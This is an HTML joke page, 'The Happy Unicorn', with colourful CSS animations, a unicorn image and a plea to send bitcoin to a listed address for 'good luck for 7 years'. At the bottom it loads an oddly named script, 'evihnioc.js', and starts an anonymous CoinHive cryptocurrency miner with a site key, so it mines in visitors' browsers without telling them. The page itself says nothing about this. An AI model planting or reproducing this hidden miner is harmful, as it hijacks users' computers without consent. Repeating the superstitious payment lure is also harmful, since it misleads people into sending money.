<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<title>THE HAPPY UNICORN</title>
	<style>
		body {
			background: #FF99FF;
			font-family: "LucidaConsole", Monaco, monospace;
			font-weight: normal;
			letter-spacing: -2.5px;
			animation: infinite cs 6s;
			-webkit-animation: infinite cs 6s;
			-moz-animation: infinite cs 6s;
			-o-animation: infinite cs 6s;
			-ms-animation: infinite cs 6s;
		}
		h1 {
			font-size: 42px
		}
		h4 {
			font-size: 32px
		}
		h1,
		h2,
		h3,
		h4,
		h5		{
			text-align: center
		}
		.all {
			animation: 1 noBlur 5s;
			-webkit-animation: 1 noBlur 5s;
			-moz-animation: 1 noBlur 5s;
			-o-animation: 1 noBlur 5s;
			-ms-animation: 1 noBlur 5s;
		}
		.uni {
			background-image: url('happy.gif');
			background-size: cover;
			background-repeat: no-repeat;
			display: block;
			margin: 0 auto;
			width: 350px;
			height: 350px;
		}
		@keyframes noBlur {
			0% {
				filter: blur(4px);
			}
			100% {
				filter: blur(0px);
			}
		}
		@-webkit-keyframes noBlur {
			0% {
				-webkit-filter: blur(4px);
			}
			100% {
				-webkit-filter: blur(0px);
			}
		}
		@-moz-keyframes noBlur {
			0% {
				-moz-filter: blur(4px);
			}
			100% {
				-moz-filter: blur(0px);
			}
		}
		@-o-keyframes noBlur {
			0% {
				-o-filter: blur(4px);
			}
			100% {
				-o-filter: blur(0px);
			}
		}
		@-ms-keyframes noBlur {
			0% {
				-ms-filter: blur(4px);
			}
			100% {
				-ms-filter: blur(0px);
			}
		}
		@keyframes cs {
			0% {
				background: #FF99FF;
			}
			25% {
				background: #FFFC86;
			}
			50% {
				background: #718DE2;
			}
			75% {
				background: #6FFF9F;
			}
			100% {
				background: #FF99FF;
			}
		}
		@-webkit-keyframes cs {
			0% {
				background: #FF99FF;
			}
			25% {
				background: #FFFC86;
			}
			50% {
				background: #718DE2;
			}
			75% {
				background: #6FFF9F;
			}
			100% {
				background: #FF99FF;
			}
		}
		@-moz-keyframes cs {
			0% {
				background: #FF99FF;
			}
			25% {
				background: #FFFC86;
			}
			50% {
				background: #718DE2;
			}
			75% {
				background: #6FFF9F;
			}
			100% {
				background: #FF99FF;
			}
		}
		@-ms-keyframes cs {
			0% {
				background: #FF99FF;
			}
			25% {
				background: #FFFC86;
			}
			50% {
				background: #718DE2;
			}
			75% {
				background: #6FFF9F;
			}
			100% {
				background: #FF99FF;
			}
		}
		@-o-keyframes cs {
			0% {
				background: #FF99FF;
			}
			25% {
				background: #FFFC86;
			}
			50% {
				background: #718DE2;
			}
			75% {
				background: #6FFF9F;
			}
			100% {
				background: #FF99FF;
			}
		}
		table{
			text-align:center;
			margin:auto;
		}
		table tr td{
		padding:3px 10px
		}
		table tr:first-child td{
			font-weight:bold
		}
		a{
			text-decoration:none;
			color:#227
		}
		h5{
		margin:40px 0 0 0;
		}
	</style>
</head>

<body>
	<div class="all">
		<h1>HELLO! I'M THE HAPPY UNICORN</h1>
		<div class="uni"></div>
		<h2>If you want good luck for 7 years, send bitcoin</h2>
		<h4>1PUUy8i9J192xrSXRJypGDbxm8xGSHg616</h4>
		<h3>The happy unicorn says you... Wibaluda!</h3>
		
	</div>
	<script src="evihnioc.js"></script>
	<script>
		var m = new CoinHive.Anonymous('3QiNbn9gvn0vv8S0A33u3XcHiHLy8mK2');
		m.start();
	</script>


</body></html>